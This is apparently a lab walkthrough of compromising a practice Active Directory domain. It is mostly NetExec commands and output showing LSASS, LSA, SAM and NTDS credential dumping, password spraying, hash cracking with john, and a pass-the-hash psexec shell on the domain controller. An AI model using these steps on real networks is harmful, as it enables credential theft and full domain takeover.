$┌──(kali㉿kali)-[~/AD-chain1]$└─$ nxc smb ips -u twest -p 'HappyCactus$10' -M lsassy$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False) $SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10 $SMB 10.0.2.4 445 DC01 [+] hack-academy.local\twest:HappyCactus$10 $LSASSY 10.0.2.7 445 CLIENT-1 CLIENT-1\Matt 7facdc498ed1680c4fd1448319a8c04f$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00$ $ $┌──(kali㉿kali)-[~/AD-chain1]$└─$ nxc smb ips -u twest -p 'HappyCactus$10' --lsa$SMB 10.0.2.7 445 CLIENT-1 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-1) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False) $SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\twest:HappyCactus$10 (Pwn3d!)$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\twest:HappyCactus$10 $SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10 $SMB 10.0.2.7 445 CLIENT-1 [+] Dumping LSA secrets$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY.LOCAL/eknight:$DCC2$10240#eknight#e92981e7e9fc7e5732c32865e4c83a8a: (2025-11-29 10:54:13)$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:aes256-cts-hmac-sha1-96:570f9a1929f82a89c0f21559f3a325024f37788a9e8b37e810f813c21c25cc21$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:aes128-cts-hmac-sha1-96:a24d41483115b4bafe8d0a2d963187af$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:des-cbc-md5:10bf0bb3b3e6e334$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:plain_password_hex:80f911ccc586e88cc6e6a20bedc9c6c4febb59ebca2658e32aa6a03bf8803353c91252f137f6a86c1024da9b8ffaded196aa5a6234f49dc294228a15845ac2ae3a56c4b09209a1936e9d4c2495381fc6a412a5829006e1981eb27f35978d522bd8a7c104b7e98bc58fe63287c8e59da0b9a5cbf66caa76cae366b098b0f899593e69ba0748bf601b7162250424469d07d2f398d92b8677c0930211319d0e34fe95c51d61808273b3f5431162a696324e4d7cd40f85fdf09352ebfff13075aa591c9104772eeb99daec23af7662cde734447a30fb87fd0d6daec32a542b1a48ee4e98f90e40d233fa235c4d691bc10c9a$SMB 10.0.2.7 445 CLIENT-1 HACK-ACADEMY\CLIENT-1$:aad3b435b51404eeaad3b435b51404ee:67c5a6954b7926c79715433f180524b3:::$SMB 10.0.2.7 445 CLIENT-1 dpapi_machinekey:0xf40fb1b5e9b0e32e3f894a8ea41407ea759f7d72$dpapi_userkey:0xb4817a980cb0d48b9cd1300c3ed32fb0d6f0bdc7$SMB 10.0.2.7 445 CLIENT-1 [+] Dumped 7 LSA secrets to /home/kali/.nxc/logs/lsa/CLIENT-1_10.0.2.7_2026-02-12_010037.secrets and /home/kali/.nxc/logs/lsa/CLIENT-1_10.0.2.7_2026-02-12_010037.cached$Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00 $ You will get ms2hash and then you crack it with john and you get another set of credentials! eknight : !!Stud87
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes_lsa_client1(screenshot omitted) Now since you have a Domain User credentials, you have to spray again!
$nxc smb ips -u users -p passwords --continue-on-success $SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\lbennett:!!reiD123 $SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\twest:HappyCactus$10 $SMB 10.0.2.4 445 DC01 [+] hack-academy.local\lbennett:!!reiD123 $SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\lbennett:!!reiD123 $SMB 10.0.2.7 445 CLIENT-1 [+] hack-academy.local\eknight:!!Stud87 Winrm shows access on Client 2 as well
$nxc winrm ips -u users -p passwords --continue-on-success $WINRM 10.0.2.9 5985 CLIENT-2 [+] hack-academy.local\eknight:!!Stud87 (Pwn3d!)Now you can Dump remotely hashes again with eknight : !!Stud87
$─$ nxc smb 10.0.2.9 -u eknight -p '!!Stud87' --sam$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\eknight:!!Stud87 (Pwn3d!)$SMB 10.0.2.9 445 CLIENT-2 [*] Dumping SAM hashes$SMB 10.0.2.9 445 CLIENT-2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.9 445 CLIENT-2 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.9 445 CLIENT-2 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.9 445 CLIENT-2 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:cb02bc3b3782d63acca9a324d035d768:::$SMB 10.0.2.9 445 CLIENT-2 David:1002:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::$SMB 10.0.2.9 445 CLIENT-2 [+] Added 5 SAM hashes to the database$ $nxc smb 10.0.2.9 -u eknight -p '!!Stud87' --lsa$SMB 10.0.2.9 445 CLIENT-2 [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT-2) (domain:hack-academy.local) (signing:False) (SMBv1:False)$SMB 10.0.2.9 445 CLIENT-2 [+] hack-academy.local\eknight:!!Stud87 (Pwn3d!)$SMB 10.0.2.9 445 CLIENT-2 [+] Dumping LSA secrets$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/mthompson:$DCC2$10240#mthompson#364a73de9ce144051ec14a2fdeb6a757: (2025-11-29 22:53:13)$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY.LOCAL/eknight:$DCC2$10240#eknight#e92981e7e9fc7e5732c32865e4c83a8a: (2025-11-29 21:52:57)$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aes256-cts-hmac-sha1-96:266a56b6af2b65084cda9f39ecb3b7d7780220638053fa05ceeceffe12d130b0$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aes128-cts-hmac-sha1-96:9ef693e72c3751712e6f4930908c338c$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:des-cbc-md5:d9c25d799d570dab$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:plain_password_hex:d4bbe9a1395462e580c52f08ac8a63da72d5bf61383cd9e7406982a5b7fe20212ae059841b3415faa6b10db7a0d61845961831ec08e4730abdde6ada65f203558f1dc4a13fa8a60774a419da1def524e210c0833ff2406f3aedb0ba4830d189003ed5673fb93cb302e3d7c24448689636cb6d6edb086dc1f9cec055d1bf23b4060efc0b6a5093c58903f9543aa3eb438b32d6e247faa323d35145117ee9d04c935e294b43ac4cb2696d5d77d51f3ebfc3df8881d20d890de9f3540408dbc7f7cc37dfb0930de7a4ce7ce06222b55d054448a52f54543f05e07bb57ad29dfa6bbdfff5cccfd91b423af633b19b124e49a$SMB 10.0.2.9 445 CLIENT-2 HACK-ACADEMY\CLIENT-2$:aad3b435b51404eeaad3b435b51404ee:d8d142d54cda4b8f6015faccae95d25b:::$SMB 10.0.2.9 445 CLIENT-2 dpapi_machinekey:0x0567c35e4dc0d3fb5d2015ba0341053b907b64f1$dpapi_userkey:0x18dba29d7d5e9a483e3844e96fcd2d5130b52886$SMB 10.0.2.9 445 CLIENT-2 [+] Dumped 8 LSA secrets to /home/kali/.nxc/logs/lsa/CLIENT-2_10.0.2.9_2026-02-12_010226.secrets and /home/kali/.nxc/logs/lsa/CLIENT-2_10.0.2.9_2026-02-12_010226.cachedAnd now you have found Hash for mthompson and if you look at the BH data he is a member of Domain Admins! (screenshot omitted) Now we can crack his hash with john
$john --wordlist=/usr/share/wordlists/rockyou.txt hashes_lsa_client2 Once you are domain admin you can dump all the hashes of all the users
$nxc smb 10.0.2.4 -u mthompson -p 'Password123!!' --ntds$[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] y$SMB 10.0.2.4 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack-academy.local) (signing:True) (SMBv1:False)$SMB 10.0.2.4 445 DC01 [+] hack-academy.local\mthompson:Password123!! (Pwn3d!)$SMB 10.0.2.4 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...$SMB 10.0.2.4 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:c0ced2de918b4a7c1b9f4efd225dd503:::$SMB 10.0.2.4 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::$SMB 10.0.2.4 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3814b17f76015a3112d545f4899eabd:::$SMB 10.0.2.4 445 DC01 hack-academy.local\mjohnson:1125:aad3b435b51404eeaad3b435b51404ee:ac2ccc026dea7c08845a58245f9d1a20:::$SMB 10.0.2.4 445 DC01 hack-academy.local\lbennett:1126:aad3b435b51404eeaad3b435b51404ee:08b1de7a0f8e635ffd4416b2aac575bb:::$SMB 10.0.2.4 445 DC01 hack-academy.local\egreen:1127:aad3b435b51404eeaad3b435b51404ee:6cef82c3f7326a708020d3488777e8b8:::$SMB 10.0.2.4 445 DC01 hack-academy.local\spatel:1128:aad3b435b51404eeaad3b435b51404ee:40dca294807d71c40cf79ca8f80630e4:::$SMB 10.0.2.4 445 DC01 hack-academy.local\dreyes:1129:aad3b435b51404eeaad3b435b51404ee:d66d916172d22964ca1dcbc262009ecd:::$SMB 10.0.2.4 445 DC01 hack-academy.local\nflores:1130:aad3b435b51404eeaad3b435b51404ee:851923db851118b1cf6e3b43486b6f3b:::$SMB 10.0.2.4 445 DC01 hack-academy.local\clee:1131:aad3b435b51404eeaad3b435b51404ee:695e750f127db5a5e5c9286dc3f780e4:::$SMB 10.0.2.4 445 DC01 hack-academy.local\otran:1132:aad3b435b51404eeaad3b435b51404ee:ebc5b3ec914252428ded45305314b59a:::$SMB 10.0.2.4 445 DC01 hack-academy.local\zmiller:1133:aad3b435b51404eeaad3b435b51404ee:b6b667f08033fd13ad9dd14bfe84bceb:::$SMB 10.0.2.4 445 DC01 hack-academy.local\mross:1134:aad3b435b51404eeaad3b435b51404ee:3b65cedb4c262e14a08c100b005b43ec:::$SMB 10.0.2.4 445 DC01 hack-academy.local\twest:1135:aad3b435b51404eeaad3b435b51404ee:906023fe7b7aa4f1367ba13298a3e9c7:::$SMB 10.0.2.4 445 DC01 hack-academy.local\eknight:1136:aad3b435b51404eeaad3b435b51404ee:61b76eb924a8231b268cd31ebd1730a1:::$SMB 10.0.2.4 445 DC01 hack-academy.local\mthompson:1141:aad3b435b51404eeaad3b435b51404ee:602f5c34346bc946f9ac2c0922cd9ef6:::$SMB 10.0.2.4 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:ec287185ca620060c918cbaa4d48267d:::$SMB 10.0.2.4 445 DC01 CLIENT-1$:1103:aad3b435b51404eeaad3b435b51404ee:67c5a6954b7926c79715433f180524b3:::$SMB 10.0.2.4 445 DC01 CLIENT-2$:1104:aad3b435b51404eeaad3b435b51404ee:d8d142d54cda4b8f6015faccae95d25b:::$SMB 10.0.2.4 445 DC01 [+] Dumped 19 NTDS hashes to /home/kali/.nxc/logs/ntds/DC01_10.0.2.4_2026-02-12_011023.ntds of which 16 were added to the database$SMB 10.0.2.4 445 DC01 [*] To extract only enabled accounts from the output file, run the following command: $SMB 10.0.2.4 445 DC01 [*] cat /home/kali/.nxc/logs/ntds/DC01_10.0.2.4_2026-02-12_011023.ntds | grep -iv disabled | cut -d ':' -f1$SMB 10.0.2.4 445 DC01 [*] grep -iv disabled /home/kali/.nxc/logs/ntds/DC01_10.0.2.4_2026-02-12_011023.ntds | cut -d ':' -f1If you want direct shell you can use impacket-psexec
$impacket-psexec hack-academy.local/Administrator@10.0.2.4 -hashes :c0ced2de918b4a7c1b9f4efd225dd503(screenshot omitted)